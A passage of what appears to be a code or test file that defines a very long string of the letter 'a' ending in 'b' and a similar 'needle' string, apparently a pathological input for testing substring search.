aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaab"
needle = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa